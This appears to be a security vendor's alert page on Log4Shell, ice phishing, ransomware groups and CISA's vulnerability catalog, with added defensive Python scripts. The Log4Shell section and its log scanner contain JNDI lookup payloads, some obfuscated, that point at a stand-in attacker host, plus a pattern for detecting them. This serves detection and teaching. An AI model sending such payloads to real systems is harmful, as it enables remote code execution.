Money is Fueling the Cyber Pandemic

The cybersecurity industry has abandoned prevention in favor of reaction
because this strategy maximizes their revenue

Ransomware Incident News & Updates | Ransomware Prevention

Learn how to best protect your network from ransomware.

Critical Alert: Chrome Zero-Day Active Attack - Update Your Chrome Browser ASAP

Google Chrome users should update their browser immediately to install Google's latest security fixes. Attackers are actively exploiting a high-severity zero-day vulnerability, so Chrome users need to act quickly. To update Chrome, open the Chrome menu, click Help, then About Google Chrome (Chrome menu > Help > About Google Chrome). That page shows whether an update is pending. Chrome downloads the update in the background, but the fix only takes effect once the browser is relaunched, so close and reopen Chrome after the update completes.

Critical Alert: Log4Shell (CVE-2021-44228) in the Popular Log4j Logging Library Allows Complete Access

Both private companies and government agencies are scrambling to protect their systems and networks from CVE-2021-44228, a flaw in the widely used Apache Log4j logging library that lets a threat actor gain complete control of a target system. The vulnerability is triggered simply by getting the application to log a specially crafted string: Log4j 2 (versions 2.0-beta9 through 2.14.1) evaluates lookups such as ${jndi:ldap://attacker-host/a} inside logged messages, contacts the attacker's server, and loads whatever Java class it returns. Because the payload can arrive in any field that ends up in a log (a User-Agent header, a username, a chat message), the attack requires no authentication and reaches far beyond web servers into any Java application that embeds the library.

Cybercriminals are weaponizing unpatched applications that bundle the vulnerable Log4j library to install Cobalt Strike beacons and cryptocurrency miners, and to recruit the hosts into botnets that compromise other systems and networks. The remedy is to upgrade Log4j (2.17.1 or later on the 2.x branch at the time of writing) in every application that embeds it, which means inventorying third-party software and not just in-house code. The log4j2.formatMsgNoLookups mitigation suggested in the first advisory was later shown to be incomplete (CVE-2021-45046) and should not be relied on alone. Exploits such as these also demonstrate how valuable application allowlisting is in protecting networks, preventing ransomware attacks, and securing critical data: even when the lookup fires, the follow-on executables (Cobalt Strike loaders, miners) cannot run if they are not on the allowlist. Code loaded inside the Java process itself is not covered by executable allowlisting, which is why patching comes first.
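To show what the "specially crafted string" looks like in practice, and why a naive search for the literal text jndi: is not enough, here is an added example (not code from the original page or from PC Matic) that scans access-log lines for Log4Shell probes. It emulates the three Log4j lookup tricks attackers used to hide the keyword (${lower:}, ${upper:} and the ${x:-default} fallback) before matching, and runs on constructed sample log lines embedded in the script; the IP addresses are from the 203.0.113.0/24 documentation range and the log format is assumed to be Apache combined log format.

```python
import re

# Innermost ${...} lookup: content contains no nested "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the obfuscation is peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(lookup: str) -> str:
    """Resolve one innermost lookup the way Log4j's string substitutor would.

    Only the transformations attackers use to hide the word "jndi" are
    emulated (lower:, upper:, and the ':-default' fallback). Anything else,
    including the jndi lookup itself, is returned unchanged so that it
    survives into the normalised string and can be matched.
    """
    low = lookup.lower()
    if low.startswith("lower:"):
        return lookup[len("lower:"):].lower()
    if low.startswith("upper:"):
        return lookup[len("upper:"):].upper()
    if ":-" in lookup:
        # ${env:NOTSET:-j} and ${::-j} both evaluate to the default "j"
        return lookup.split(":-", 1)[1]
    return "${" + lookup + "}"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup, plain or obfuscated."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (line_number, normalised_line) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample access-log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET /x HTTP/1.1" 200 1 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 1 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Lines 2 to 4 of the sample are flagged and line 5, a harmless ${date:} lookup, is not. A real deployment would feed this the combined output of every log that unauthenticated input can reach, not only the web access log, because the vulnerable call is the logging of the string, not the HTTP request.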

Ransomware Cybersecurity

Critical Alert Update: New Apache Log4j Release Patches CVE-2021-44832

CVE-2021-44832 Log4j patch update. The Apache Software Foundation (ASF) has now released fixes for four of the five vulnerabilities disclosed in Log4j since Log4Shell. The latest, CVE-2021-44832, is a remote code execution flaw with a CVSS score of 6.6 out of 10; it requires an attacker who can already modify the logging configuration file (to point a JDBC Appender at a malicious JNDI URI), so it is far less severe than CVE-2021-44228, but it is fixed in Log4j 2.17.1 and should be picked up in the same upgrade. The fifth flaw, CVE-2021-4104, affects the JMSAppender in the end-of-life Log4j 1.2 branch, which the ASF no longer patches; the only fix there is to migrate to Log4j 2.

In addition, the FTC has warned companies that failing to protect consumer data from Log4j attacks may violate the law and could lead to enforcement action. Implementing application allowlisting is one of the best ways to protect critical and sensitive data. CISA has also published guidance and an open-source scanner for the Log4j vulnerability.

Critical Security Alert: Cyber-Attacks Reach Almost 1,000 Per Organization Per Week, an All-Time High

Cyber-attacks on organizations rose 50 percent year-over-year in 2021, peaking at more than 900 attempted attacks per organization per week in the fourth quarter, with the Log4j vulnerabilities driving a large share of the December spike. We are experiencing a cyber pandemic and a ransomware crisis. Fight ransomware with application allowlisting: whitelisting solutions prevent unapproved code from running on your network and block ransomware payloads before they execute.

Cloud Security Compromise and Remote Access Trojan Exploits. Attackers are increasingly hosting their payloads and command-and-control infrastructure on public cloud services from Microsoft (Azure) and Amazon (AWS), because traffic to these platforms blends in with legitimate business use and is rarely blocked. Phishing emails deliver a downloader that fetches variants of the AsyncRAT, Nanocore and Netwire remote access trojans from cloud-hosted URLs. Application allowlisting prevents the downloaded executables from running whether the endpoint sits on premises, in the cloud, or in a hybrid environment; at the network layer, do not treat cloud-provider address ranges as trusted by default.

Windows Microsoft Defender Antivirus Vulnerability. Attackers can use Microsoft Defender's own exclusion list to deliver malware. The exclusions configured for Defender (paths, extensions and processes) were stored in the registry under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions and could be read by any local user, so an attacker with a foothold can enumerate the folders Defender never scans and plant payloads there. Treat an exclusion list as public information: keep it as short as possible, never exclude whole user-writable directories, and audit it regularly (Get-MpPreference lists the current exclusions). As this demonstrates, blocklist-based antivirus such as Windows Defender is not enough to stop ransomware on its own. Allowlisting products that block anything not explicitly approved do not care where a file sits on disk, so an excluded folder does not become a launch pad.

Critical Microsoft Alert: Ice Phishing Warning on Web3 Blockchains

Microsoft warns of the growing use of ice phishing, a technique for stealing cryptocurrency that works by tricking the victim into signing a legitimate-looking transaction. Decentralized finance (DeFi) applications such as the Uniswap decentralized exchange (DEX) cannot move a user's ERC-20 tokens directly; the user first signs an approve() transaction that authorizes a spender, normally the exchange's router contract, to transfer up to a given amount of tokens on the user's behalf (for example, approving the router before swapping USDC for LINK). In an ice phishing attack the attacker serves a modified front-end, or injects a fake transaction, in which the spender address is the attacker's contract instead of the legitimate router, often with an unlimited allowance. The user signs with their own key, so neither the immutability of the smart contract nor a hardware wallet guarding the private key prevents the theft: the attacker simply calls transferFrom() later and drains the approved tokens. This is what happened in the BadgerDAO attack of December 2021, where malicious approvals injected into the project's web front-end allowed roughly $120 million to be taken without a single private key being stolen. The fraud succeeds because wallet interfaces show that an approval is being requested but rarely make the spender address or the allowance amount obvious. Users should read the spender and amount in every approval prompt, avoid unlimited allowances, and periodically revoke approvals they no longer need. Microsoft's write-up points to Forta, a real-time transaction monitoring network for smart contracts, as one way to raise alerts on suspicious approvals.
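The attack primitive above is a single approve() call whose spender is wrong. The following added example (not code from the original page, Microsoft or Forta) decodes the ABI calldata of an ERC-20 approve() or ERC-721 setApprovalForAll() transaction and flags the two ice-phishing tells: a spender that is not on the user's list of known contracts, and an unlimited allowance. The Uniswap V2 router address is public; the attacker address 0x...dead and the sample transactions are constructed for the example, and the "known spenders" set is an assumption the reader would replace with their own.

```python
# Function selectors: first 4 bytes of keccak256 of the canonical signature.
APPROVE_SELECTOR = "095ea7b3"        # approve(address,uint256)        (ERC-20)
SET_APPROVAL_FOR_ALL = "a22cb465"    # setApprovalForAll(address,bool) (ERC-721/1155)
UNLIMITED = 2**256 - 1

# Spenders the user has deliberately chosen to trust. The Uniswap V2 router
# address is public; treating this one-entry set as "known" is an assumption.
KNOWN_SPENDERS = {
    "0x7a250d5630b4cf539739df2c5dacb4c659f2488d",  # Uniswap V2 Router02
}


def _word(calldata: bytes, index: int) -> bytes:
    """Return the index-th 32-byte ABI word after the 4-byte selector."""
    start = 4 + 32 * index
    word = calldata[start:start + 32]
    if len(word) != 32:
        raise ValueError("calldata too short")
    return word


def decode_approval(calldata_hex: str):
    """Decode an approve() or setApprovalForAll() call; None for any other selector."""
    data = bytes.fromhex(calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex)
    selector = data[:4].hex()
    if selector == APPROVE_SELECTOR:
        spender = "0x" + _word(data, 0)[12:].hex()   # address is right-aligned in its word
        amount = int.from_bytes(_word(data, 1), "big")
        return {"kind": "approve", "spender": spender, "amount": amount}
    if selector == SET_APPROVAL_FOR_ALL:
        operator = "0x" + _word(data, 0)[12:].hex()
        approved = int.from_bytes(_word(data, 1), "big") != 0
        # "approved for all" is effectively an unlimited allowance over every token
        return {"kind": "setApprovalForAll", "spender": operator,
                "amount": UNLIMITED if approved else 0}
    return None


def assess(calldata_hex: str, known_spenders=KNOWN_SPENDERS):
    """Return human-readable warnings; an empty list means nothing suspicious."""
    decoded = decode_approval(calldata_hex)
    if decoded is None:
        return []
    known = {s.lower() for s in known_spenders}
    warnings = []
    if decoded["spender"].lower() not in known:
        warnings.append(f"{decoded['kind']}: spender {decoded['spender']} is not a known contract")
    if decoded["amount"] == UNLIMITED:
        warnings.append(f"{decoded['kind']}: unlimited allowance requested")
    return warnings


def _encode_approve(spender: str, amount: int) -> str:
    """Build approve() calldata for the constructed samples below."""
    addr = bytes.fromhex(spender[2:]).rjust(32, b"\x00")
    return "0x" + APPROVE_SELECTOR + addr.hex() + amount.to_bytes(32, "big").hex()


# Constructed samples: a normal swap approval for 1,000 USDC (6 decimals) and an
# ice-phishing approval naming an attacker-controlled placeholder contract.
LEGIT_APPROVE = _encode_approve("0x7a250d5630b4cf539739df2c5dacb4c659f2488d", 1_000 * 10**6)
PHISHED_APPROVE = _encode_approve("0x000000000000000000000000000000000000dead", UNLIMITED)

if __name__ == "__main__":
    for label, tx in (("legit", LEGIT_APPROVE), ("phished", PHISHED_APPROVE)):
        print(label, assess(tx) or "ok")
```

The check is deliberately placed on the calldata the wallet is about to sign, because that is the only point at which the user can still say no; once the signature exists, the contract's immutability works for the attacker.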

Critical Windows Alert Update: CISA issues Feb 18, 2022 Deadline to Federal Agencies to patch Windows 10 Privilege Escalation Bug

CVE-2022-21882 affects all unpatched versions of Windows 10 (and Windows Server 2019) and was added to CISA's Known Exploited Vulnerabilities catalog with a February 18, 2022 remediation deadline for federal agencies. It carries a CVSS score of 7.0 and needs no user interaction, but it is a local privilege escalation (LPE), so the attacker must already be running code on the machine as a low-privileged user; it is a bypass of the earlier patch for CVE-2021-1732 in the Win32k.sys kernel driver. From that foothold, a ransomware affiliate's initial-access malware can elevate to SYSTEM, disable security tooling, dump credentials and move laterally across the network, which is why a 7.0-rated bug that is actively exploited deserves emergency patching rather than the routine cycle.

Critical Malware Alert: TrickBot Targeting Financial, Technology and Cryptocurrency Firms

The TrickBot malware is targeting customers of financial, technology, professional services and cryptocurrency firms. TrickBot itself is a modular banking trojan and loader rather than ransomware; it is dangerous because it is the first stage of intrusions that end in Ryuk or Conti ransomware. Recent analysis describes a "bazaar of tricks": heavy use of obfuscation, anti-analysis and anti-debugging techniques that let TrickBot's modules evade detection, resist reverse engineering and survive removal attempts. The same operators deploy BazarLoader and BazarBackdoor, a related backdoor family that runs largely in memory to give the attackers stealthy persistence on a system. The campaigns target high-value victims with administrative privileges in order to steal their credentials and move laterally across the network to confidential financial and other sensitive data. Because TrickBot and the Bazar tools both depend on executing new, unrecognized binaries and scripts, application allowlisting solutions, which only allow programs on the system's approved list to run, are highly effective against this kind of intrusion chain.

Critical Android Security Alert: Android Users Tricked Into Downloading Malware

Millions of Android users have installed the Dark Herring scamware from Google Play, normally a relatively safe source of apps. More than 450 malicious Android applications used deceptive listings to distribute the malware through Google Play and third-party app stores. Google has removed the apps from the store, but users who already have them installed remain at risk until they uninstall them. Dark Herring is a billing-fraud malware: it silently enrolls the victim in premium direct-carrier-billing subscriptions, so the charges appear on the cell-phone carrier bill rather than as an obvious app purchase. Users should check their carrier bills for unexplained subscriptions and consider an allowlisting-based security app for Android to prevent unapproved code from running on their mobile devices.

Android trojans Medusa and FluBot possess spyware and RAT abilities used to steal banking funds from unsuspecting victims. These stealthy mobile remote access trojans (RATs) let the attacker remotely gain access to and control of an infected device. A favorite delivery avenue is smishing: malicious SMS text messages that link to a fake app such as a bogus parcel-tracking or voicemail app. Once the trojan is running and has been granted the Accessibility permission, the operator's command-and-control server can remotely tap specific user-interface elements, take screenshots, lock the device, list installed apps, read notifications, log keystrokes and overlay fake login screens on top of banking apps to capture credentials. Medusa and FluBot are evolving their capabilities and are a serious threat to mobile banking apps.

Critical Apple macOS Security Alert: ElectroRAT, Silver Sparrow, XLoader, XcodeSpy, XCSSET, and MacMa Threaten Mac Users

While Apple macOS and iOS devices still have some security advantages, that advantage is shrinking as attackers increase their focus on Macs and iPhones. Threat actors are using zero-day exploits to deliver Mac-specific malware to their targets. New threats such as ZuRu and OSX.CDDS (also known as MacMa) give attackers remote access to Mac devices, and XLoader can log keystrokes, take screenshots, steal login credentials and download further malware, including ransomware. PC Matic for Mac uses application allowlisting to prevent threat actors from running unapproved code on a Mac.

Critical Security Alert: Insecure WordPress Plugin Leaves 20 Thousand Sites Vulnerable

The WP HTML Mail WordPress plugin, installed on roughly twenty thousand sites, is open to a cross-site scripting (XSS) attack: an unauthenticated attacker can inject JavaScript into the plugin's email templates, so the script ends up inside otherwise trusted emails and administrative pages. Stored XSS of this kind is dangerous because the injected script runs with the privileges of whoever views it; when that is an administrator, the script can silently create a new admin account, install a backdoor plugin, or redirect the site's visitors to phishing pages, all without the attacker ever logging in. Site owners should update the plugin immediately.

Critical Security Alert: McAfee Vulnerability Can Allow Hackers to Gain Elevated Windows SYSTEM Privileges

McAfee Agent, the management component of McAfee's enterprise security products, had two high-severity vulnerabilities that allow a local attacker to execute code with SYSTEM privileges. With SYSTEM privileges an attacker achieves arbitrary code execution (ACE) and can take full control of the machine, including disabling the security software itself. McAfee has issued a patch and customers should update their McAfee products immediately.

Critical Browser Alert: Chrome to Restrict Public Websites From Reaching Private Network Endpoints

As part of a security change called Private Network Access, Google's Chrome will stop public websites from silently sending requests to endpoints on a user's private network (home routers, printers, and intranet services on 192.168.x.x, 10.x.x.x or localhost). Attackers have used this route for years: a malicious page on the public internet makes the visitor's browser issue requests to the router's admin interface or an internal service, turning the browser into a pivot into the network. Chrome now requires the internal device to opt in: before a public page may reach a private address, the browser sends a CORS preflight carrying the header Access-Control-Request-Private-Network: true, and the device must answer with Access-Control-Allow-Private-Network: true or the request is blocked. Administrators of internal web applications should expect breakage if they rely on being reached from public pages, and should treat the change as a reason to stop doing so.

CyberSecurity Tip: Use Zero-Trust Whitelisting Security to Fight Phishing Vulnerabilities

With WFH (Work-From-Home) becoming a mainstay of the distributed workforce, cybersecurity IT personnel are finding it a challenge to properly authenticate and monitor every single connected device including mobile phones, tablets, and IoT (Internet of Things) devices. In fact, malware infections on IoT devices rose by 35% year over year. Hackers now have a greater attack surface than ever before upon which to launch their phishing attacks and (SMS) smishing attacks.

Cybercriminals are increasingly concentrating their efforts on employees' vulnerable mobile devices, with considerable success. Using social engineering combined with business communications data harvested from compromised company email accounts and address books, attackers craft convincingly realistic business messages. These highly effective phishing attacks give bad actors a foothold from which to launch ransomware attacks on a company's network. Devices that were once considered relatively safe from malware, such as Chromebooks (Chrome OS) and Apple's macOS and iOS, are just as exposed to phishing, credential theft and browser-based exploits, because those attacks target the user and the browser rather than the operating system.

To prevent ransomware from running on any device, combine robust email-security with Zero Trust Whitelisting Solutions and Secure Remote Desktop Access Control. Since only approved, safe applications on the app whitelist can execute, IT administrators can better protect their networks from ransomware attack via phishing.

Ransomware Security Alert: Cyber-Gangs Use Prometheus TDS to Distribute Malware and Remote Access Trojans

Hacker gangs are using Prometheus TDS, an underground traffic direction service sold as crimeware-as-a-service (not to be confused with the open-source Prometheus monitoring tool), to filter victims by location and browser and redirect them to malicious downloads, together with Cobalt Strike, a commercial adversary-simulation framework that has become a standard post-exploitation tool for ransomware crews. Prometheus TDS campaigns distribute Qbot, IcedID, Campo Loader, Hancitor and SocGholish through drive-by downloads and social engineering, infecting endpoints with loaders that lead to ransomware and remote access trojans (RATs).

Ransomware News Alert: The International Red Cross Suffers a Major Cyber-Attack

The International Committee of the Red Cross (ICRC) suffered a major cyber-attack in which the sensitive personal data of more than 500,000 people is now in the hands of the intruders. The ICRC has asked to speak directly and confidentially with the attackers, appealing to their humanity not to release data that could put people's lives in jeopardy. The organization works worldwide with people in particularly vulnerable and dangerous circumstances, including those separated from their families by conflict, so unlike financial data held for ransom, the exposure of this data has far broader safety implications.

Security News Alert: Record Denial of Service Attacks Launched Against Microsoft Azure

Record-breaking distributed denial-of-service (DDoS) attacks exceeding 3 Tbps were launched in succession against Microsoft Azure customers. Microsoft was able to mitigate the attacks, but the size and frequency of the DDoS assaults are alarming.

Security News Alert: US and Russia Crack Down on the REvil Hacking Group

The US request that the Russian government crack down on the REvil ransomware group is bearing fruit: the Russian Federal Security Service (FSB) has raided members of the group and reports that fourteen people have been detained and charged under Russian law with the illegal circulation of means of payment. The FSB also states that it has dismantled the group's infrastructure.

Security News Alert: Ukraine Government Websites Hit by WhisperGate Wiper

Hackers hit Ukraine with a massive cyber-attack on Ukrainian government websites. As a result, the websites of Ukraine's ministry of foreign affairs and other government agencies went off-line. The attackers used a new strain of destructive malware known as WhisperGate, which is disguised as ransomware but is actually a wiper. Its first stage overwrites the Master Boot Record (MBR) so the machine can no longer boot, displaying a fake ransom note in place of the operating system, and a second stage corrupts files across the disk; the damage is irreversible and becomes apparent the next time the system restarts. There is no decryption key to buy, so backups and rapid containment, rather than ransom negotiation, are the only recovery path.

FBI Cybersecurity Alerts

Critical FBI Security Flash Alert: RagnarLocker Ransomware Threat to Critical Infrastructure

The FBI has released a FLASH report detailing indicators of compromise (IOCs) associated with the RagnarLocker ransomware group, which has hit organizations in critical infrastructure sectors including manufacturing, energy, financial services, government and information technology. The actors scan for vulnerable internet-facing services and exposed remote access, gain a foothold, then deploy tools to harvest credentials and exfiltrate sensitive data before Ragnar Locker encrypts the target's servers, so that victims can be extorted both for the decryption key and to prevent the stolen data from being leaked. Defenders should load the FLASH's IOCs into their detection tooling and prioritize the mitigations it lists.

Critical FBI Security Alert: Critical Infrastructure Ransomware Attack Warning

The FBI and the US Secret Service warn that BlackByte ransomware attacks are targeting multiple critical infrastructure sectors in the United States, including government facilities, financial services, and food and agriculture. BlackByte is a ransomware-as-a-service (RaaS) group. Its operators have gained initial access by exploiting known Microsoft Exchange Server vulnerabilities and then moved laterally across the network, and one variant has been observed hidden inside what appears to be a .png image file in order to slip past file-type checks. Organizations should keep operating systems and Exchange servers patched and up to date, enforce multi-factor authentication, remain vigilant against phishing and smishing, implement a zero-trust application allowlisting solution, and lock down remote desktop access.

Critical FBI Security Alert: FBI Warns of Possible Winter Olympics 2022 Cyber-Attacks

The FBI warns that cybercriminals could launch distributed denial-of-service (DDoS) attacks, ransomware, email phishing, spyware and other malware attacks on Winter Olympics broadcasters, vendors, sponsors, visitors and participants. Cyber-intrusions, ransomware and DDoS attacks could interrupt live broadcasts or breach the networks of vendors, hotels, food services, energy or transportation providers, and both private and public sponsors are at risk of targeted malware attacks aimed at sensitive data. Laptops, tablets and mobile devices are especially exposed, which is why the U.S. Olympic Committee advised participants and visitors to use burner phones and leased computers for the event: there should be no expectation of security or privacy on devices taken to the Games.

At a minimum, the guidance said, Windows and macOS machines travelling to China should be wiped of personal and business data and hardened with appropriate security software and settings at the firmware (BIOS/UEFI), authentication and application level.

Critical FBI Security Alert: Ransomware Group FIN7 is Mailing Maliciously Infected USB Sticks to Install Ransomware

The FBI is warning that the FIN7 cybercrime group has been mailing malicious USB devices to targets in the insurance, transportation and defense industries, in packages posing as official mail from the US Department of Health and Human Services or as gifts from Amazon. The "BadUSB" sticks register as a keyboard when plugged in and inject keystrokes that download malware, giving the attackers a foothold that has led to ransomware deployment, including BlackMatter and REvil. Organizations should block unregistered USB devices by policy and treat unsolicited hardware as hostile.

Critical Security Alert: NortonLifeLock's Norton 360 and Avira Bundle a Cryptominer in Their Antivirus Software

Norton Crypto and Avira Crypto mine Ethereum (ETH) using customers' machines. Norton began offering the feature in 2021 and the miner now ships by default with Norton 360 and with Avira (both owned by NortonLifeLock); mining must be switched on by the customer, but the software is installed whether or not it is ever enabled, and the company keeps a 15 percent cut of anything mined, presented as a service that also creates a cryptocurrency wallet for the customer. Many long-time Norton customers were shocked to find their antivirus installing crypto-mining software. A security product should be detecting and blocking cryptominers, not bundling them. This is another example of why allowlist technology is needed: whitelisting software blocks any attempt to run unauthorized programs such as cryptominers in the background, no matter who installed them.

Ransomware Alert: Media Giant Impresa Hit by Ransomware Attack

Impresa is one of the largest media companies in Portugal with the biggest television station, online newspaper, and other digital media properties. The ransomware gang Lapsus$ appears to have accessed the media company's critical server infrastructure impacting Impresa's operations including video streaming. The cyber-gang gained unauthorized access through the company's (AWS) Amazon Web Services account. This ransomware incident highlights the importance of server cyber security and ransomware protection.

Cyber Alert: Broward Health Hospital System Data Breach

The Broward Health hospital system suffered a data breach in which hackers gained unauthorized access to sensitive staff and patient data. The intruders obtained protected personal and medical information of both staff and patients that is normally protected under HIPAA, which sets national standards to prevent sensitive patient health information, including electronic health records (EHR), from being disclosed without a patient's knowledge or explicit consent. The exposed data includes names, social security numbers, dates of birth, addresses, driver's license numbers, banking information, complete patient histories, diagnoses and medical treatment records, covering over 1.3 million patient records. The attackers got in through a third-party medical provider that had been granted access to Broward Health's systems, which demonstrates the need for network security best practices such as application allowlisting and tightly scoped, monitored third-party access.

Cyber Alert: LogMein's LastPass Password Manager Vulnerability

LastPass says that none of its 30 million users and 85,000 business customers have been compromised by credential-stuffing attacks, despite email alerts it sent to customers warning of blocked master-password logins from unfamiliar locations. LastPass states those alerts were sent in error. The alerts led some users to believe their accounts were being targeted with email addresses and passwords stolen in third-party breaches, which is exactly how credential stuffing works: attackers replay leaked username and password pairs against other services. Incidents like this show why password hygiene matters. Create strong, unique passwords of at least 13 characters, never reuse a password across websites, social media or apps, and always enable multi-factor authentication on all your accounts, especially on the password manager itself.

Vulnerability Alert: Microsoft Azure App Service Source Code Exposure

Microsoft Azure App Service had a vulnerability (reported by Wiz as "NotLegit") that exposed the source code of web applications written in PHP, Python, Ruby or Node.js when they were deployed using Local Git. The deployment left the application's .git directory inside the publicly served web root, so anyone could download the repository, including its commit history, and with it hard-coded credentials, API keys and access tokens, then use them to reach sensitive data and map the network for a follow-on attack. Applications served by IIS were not affected because a web.config rule blocks requests for the .git folder; applications on the Linux-based images for PHP, Python, Ruby and Node.js had no equivalent rule until Microsoft corrected the images and notified affected customers. Anyone who deployed this way should assume the repository was readable, rotate every secret that was ever committed, and add an explicit deny rule for /.git in their web server configuration. Controls such as application allowlisting that prevent unapproved code from executing on systems should be part of every security stack, but they do not prevent a secret leak of this kind; secret scanning and rotation do.

Cyber Alert: Stolen Credentials Used to Register Rogue Devices for Lateral Phishing

Attackers are abusing Azure AD device registration to run lateral phishing campaigns against businesses. Microsoft has released details of a targeted campaign in which phishing emails harvested Office 365 credentials; the attackers then used the stolen credentials to register their own device in the victim organization's Azure AD and, from that "trusted" device, sent further phishing emails inside the organization and to its partners, widening the pool of compromised accounts. Because the rogue device was enrolled, it satisfied policies that trusted registered devices. In tenants where multi-factor authentication was enforced, the device registration itself was blocked, which is why MFA on every account and on device enrollment was what stopped the attack.

Critical Alert: All in One SEO Exploit - WordPress Plugins Continue to be a Major Vulnerability

The All in One SEO WordPress plugin had a critical security vulnerability that allows privilege escalation leading to backdoor admin access. The flaw lets a regular subscriber escalate to unauthorized administrator privileges on the site. With admin privileges, attackers can reach the plugin's REST API endpoint and send malicious SQL (SQL injection) to the database to steal credentials and other data. All in One SEO users should immediately upgrade to the patched 4.1.5.3 version.

In addition, almost 100 WordPress plugins and themes from a single developer were found to carry a backdoor planted in a supply-chain attack on the developer's own download site. WordPress plugins have also been used to hide credit-card skimmers: attackers inject the skimming code into a plugin's files rather than into the wp-admin or wp-includes core directories, because site-integrity checks usually focus on core files.

Ransomware Alert: Ransomware Strikes Ultimate Kronos Group HR Management

UKG is one of the largest Human Resources Software Management firms offering employee and payroll services. A ransomware attack is impacting companies whose employees use Kronos software to manage payroll, electronically clock in and out, track expenses, and benefits including vacation, sick days, and (PTO) paid time off. Kronos is currently investigating to determine if there is any relationship between the Log4Shell Log4j vulnerability exploit and the ransomware attack.

CISA (the Cybersecurity and Infrastructure Security Agency) maintains a Known Exploited Vulnerabilities catalog that serves as an essential patch-prioritization tool: it lists only flaws confirmed to be exploited in the wild, each with a required action and a due date, and it is published as a JSON and CSV feed as well as a web page.

In a January 2022 update, CISA added 17 actively exploited vulnerabilities to the Known Exploited Vulnerabilities catalog in a single batch, each with a remediation deadline that federal agencies must meet under Binding Operational Directive 22-01. The flaws on the list are the kind that let bad actors gain unauthorized access to devices and networks, execute code remotely or escalate privileges, steal credentials, download and run malware, and exfiltrate critical or confidential data; they are exactly the entry points ransomware affiliates use for advanced persistent threat (APT) style intrusions. Organizations outside the federal government should use the catalog the same way: match it against vulnerability-scanner output and patch KEV entries ahead of everything else.
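As an added example (not code from the page or from CISA), the script below shows how a team outside the federal government can consume the catalog: it parses a constructed excerpt in the shape of CISA's KEV JSON feed, lists entries whose due date has passed, and joins the catalog against a vulnerability scanner's open CVE list to produce a patch order. Field names match the real feed; the two entries use CVE IDs discussed on this page with illustrative dates, so authoritative dates should be taken from the live feed.

```python
import json
from datetime import date

# Constructed excerpt shaped like CISA's KEV feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# Field names match the feed; the dates are illustrative, not authoritative.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2022.02.04",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2021-44228",
            "vendorProject": "Apache",
            "product": "Log4j2",
            "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
            "dateAdded": "2021-12-10",
            "shortDescription": "JNDI features do not protect against attacker-controlled LDAP endpoints.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2021-12-24",
        },
        {
            "cveID": "CVE-2022-21882",
            "vendorProject": "Microsoft",
            "product": "Win32k",
            "vulnerabilityName": "Microsoft Win32k Privilege Escalation Vulnerability",
            "dateAdded": "2022-02-04",
            "shortDescription": "Win32k contains a vulnerability that allows for privilege escalation.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-02-18",
        },
    ],
})


def load_kev(text: str):
    """Parse the KEV JSON document and return its list of vulnerability records."""
    return json.loads(text)["vulnerabilities"]


def overdue(entries, today: date):
    """CVE IDs whose remediation due date is already in the past, sorted."""
    return sorted(e["cveID"] for e in entries if date.fromisoformat(e["dueDate"]) < today)


def match_inventory(entries, open_findings):
    """Intersect KEV with a scanner's list of open CVEs (case-insensitive on the ID)."""
    wanted = {c.upper() for c in open_findings}
    return [e for e in entries if e["cveID"].upper() in wanted]


def prioritise(entries, open_findings, today: date):
    """(cveID, dueDate, days_overdue) for matched entries, most overdue first.

    A negative days_overdue means the deadline is still in the future.
    """
    rows = []
    for e in match_inventory(entries, open_findings):
        due = date.fromisoformat(e["dueDate"])
        rows.append((e["cveID"], e["dueDate"], (today - due).days))
    return sorted(rows, key=lambda r: r[2], reverse=True)


if __name__ == "__main__":
    kev = load_kev(KEV_SAMPLE)
    # Constructed scanner output: one KEV hit and one CVE that is not in the catalog.
    findings = ["cve-2022-21882", "CVE-2021-44832"]
    for row in prioritise(kev, findings, date(2022, 2, 20)):
        print(row)
```

In production the `KEV_SAMPLE` string is replaced by the downloaded feed and `findings` by the CVE column of the scanner export; the rest of the logic is unchanged, and the days-overdue value is what goes on the ticket.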

FBI & CISA Cyber Alert for the Holidays

The FBI and CISA are issuing a holiday cyber-threat warning regarding hackers and prospective holiday cyber-attacks. US officials are urging increased vigilance on the part of organizations and their IT security teams over the holidays. The cybersecurity advisory alerts security professionals to the heightened risks over the holiday season to include Thanksgiving, Christmas and New Year's for critical infrastructure, business network, and other high-visibility ransomware attacks. The advisory also encourages preventive security actions such as updating systems and applications, applying security software patches, implementing MFA (Multi-Factor Authentication), and reviewing current cyber-incident and business continuity plans.

